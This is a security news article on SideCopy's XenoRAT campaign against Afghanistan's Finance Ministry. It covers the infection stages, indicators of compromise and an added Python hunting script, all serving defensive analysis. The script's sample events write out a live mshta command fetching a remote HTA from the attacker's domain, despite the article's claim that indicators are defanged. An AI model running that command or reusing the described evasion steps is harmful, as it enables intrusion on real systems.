GBHackers

SideCopy Deploys Persistent XenoRAT Against Afghanistan Finance Ministry


Pakistan-linked threat actor SideCopy has launched a highly targeted spear-phishing campaign against Afghanistan’s Ministry of Finance (MoF). The operation surgically targets all 34 provincial revenue directorates, operating under the broader Transparent Tribe (APT36) umbrella.

According to threat intelligence reports from Seqrite, the campaign culminates in the deployment of a customized XenoRAT 1.8.7 implant that beacons to bulletproof European infrastructure.

The attack sequence opens with a ZIP archive containing a malicious LNK file. Threat actors assigned this file a carefully crafted Pashto-language filename translating to “List of Employees Who Were Introduced to the Intellectual and Psychological Warfare Seminar.”

The use of Pashto, the dominant language across Afghanistan’s government institutions, signals deep operational familiarity with the target environment and with provincial finance officials.

Infection Chain (Source: Seqrite)

Upon execution, the malware drops a decoy document containing a highly detailed provincial staff directory. This document spans all 34 provinces, listing Finance Directors, Revenue Chiefs, and direct mobile numbers in both Dari and Pashto.

Seqrite notes that this level of detail suggests extensive prior intelligence gathering by the threat actor before launching the campaign.

The campaign executes through a sophisticated infection chain engineered to minimize disk artifacts and evade detection at every layer.

Key stages in this deployment sequence include:

  • The LNK file abuses mshta.exe as a Living-off-the-Land Binary (LOLBIN) to silently fetch a remote HTA payload from a compromised Afghan education domain (abimj[.]edu[.]af).
  • The second stage delivers a heavily obfuscated JScript payload containing hex-encoded string arrays and a custom Base64 decoding routine to load a Loader DLL.
  • Stage three introduces a .NET DLL that drops a decoy PDF while establishing Registry-based persistence under a typosquatting value named “Edgre” to mimic Microsoft Edge.
  • A second .NET shellcode loader downloads a disguised payload (ayui.vmxx) and reconstructs it entirely in memory using VirtualAlloc() and CreateThread().
  • The malware patches AmsiScanBuffer() to disable AMSI scanning before using Assembly.Load for fully reflective, fileless in-memory execution.

The final stage delivers XenoRAT 1.8.7, which connects to a command-and-control (C2) server over TCP using AES-encrypted, RTL-compressed traffic.

Government Network Asset Identified via ASN (Source: Seqrite)

SideCopy enforces single-instance execution on the compromised host using the hardcoded mutex “clouda.” Once deployed, XenoRAT delivers a comprehensive post-exploitation toolkit featuring keylogging, screen capture, webcam surveillance, and SOCKS5 network tunneling.

Seqrite confirmed that this adoption of XenoRAT aligns with SideCopy’s documented shift toward customized open-source malware following prior AsyncRAT campaigns.

The attackers deliberately staged malicious traffic alongside legitimate Afghan government assets, routing the delivery domain to AS58469.

Furthermore, the RAT C2 server (185.235.137.106) relies on a Frankfurt-based bulletproof provider that has previously been tied to other SideCopy infrastructure clusters.
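As an added hunting example (not code from the article or from Seqrite), the following Python rules flag three of the observables named above over constructed, normalized endpoint events: mshta.exe handed a URL, a Run-key value named “Edgre”, and a connection to the XenoRAT C2 address. The event field names and rule labels are assumptions; only the indicator values come from the article.

```python
import re

# Indicators taken from this article; the event shape and rule names are assumptions.
C2_IP = "185.235.137.106"
DELIVERY_DOMAIN = "abimj.edu.af"   # printed defanged above as abimj[.]edu[.]af
PERSISTENCE_VALUE = "edgre"        # typosquat of "Edge" used as a Run-key value name
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)

def hunt(event: dict) -> list[str]:
    """Return the names of the rules a single normalized endpoint event trips."""
    hits = []
    kind = event.get("type")
    if kind == "process":
        image = event.get("image", "").lower()
        cmdline = event.get("cmdline", "")
        # Stage 1: mshta.exe given a URL means a remote HTA is being fetched (LOLBIN abuse)
        if image.endswith("mshta.exe") and re.search(r"https?://", cmdline, re.I):
            hits.append("mshta_remote_hta")
        if DELIVERY_DOMAIN in cmdline.lower():
            hits.append("delivery_domain")
    elif kind == "registry":
        target = event.get("target", "")
        value_name = target.rsplit("\\", 1)[-1].lower()
        # Stage 3: persistence written as a Run-key value named "Edgre"
        if RUN_KEY_RE.search(target) and value_name == PERSISTENCE_VALUE:
            hits.append("edgre_run_key")
    elif kind == "network" and event.get("dest_ip") == C2_IP:
        # Final stage: XenoRAT beaconing to the Frankfurt-hosted C2
        hits.append("xenorat_c2")
    return hits

# Constructed sample telemetry, not real logs from the campaign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://abimj.edu.af/ugayt.hta"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},   # local HTA, no hit
    {"type": "registry",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Edgre"},
    {"type": "registry",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
    {"type": "network", "dest_ip": "185.235.137.106"},
    {"type": "network", "dest_ip": "1.1.1.1"},
]

def run(events=SAMPLE_EVENTS) -> dict[int, list[str]]:
    """Map event index -> triggered rules, keeping only events that hit."""
    return {i: hunt(e) for i, e in enumerate(events) if hunt(e)}
```

Calling run() on the constructed events returns hits for indices 0, 2 and 4 only; the local-HTA and OneDrive entries stay quiet, which is the false-positive check a hunter would want before deploying the rules.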

Indicators of Compromise

Artifact          SHA256 Hash
ZIP Archive       194B912C242604D6F9A79369F22338C58A13CE0CC2ED280CE505075808BC2F14
LNK File          3B4194BDFE40D94031A94B30397FFD8A4B09D0A4057668E897B8BDCD1703DD01
Decoy PDF         DF9173A28C0B0B878C10A53D35CD7CE6F6ED66D207B6B7C4FF723721F1C027AB
ugayt.hta         A63E90EE57A1F213A8FE76EF1A6CFF5AE9ED7EBCEDA258431533825E648C0C67
noway.bat         5833917BD137804F5A021D2CB37ADFE5C4B7B67DBB06D59C3B9C5CF393835E45
zuidrt.hta        99127C8C67D90E2776BEEB85281F9C68399BF4567B07A6B638D68B760212E88D
WayBroad.dll      8F2D979EF33B2900351C94C7335275A9342C75189E1A901998E90A539E944A1A
Aotestpass.dll    0019212F25EB04BBB33BB194879C095265DB7855D6003BDD777CF0CBB90EB772
XenoRAT           9AE3D785486022AF82EA92E51B26E3F55C1BBA88A7BE2AD9790F4240E8499D14

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
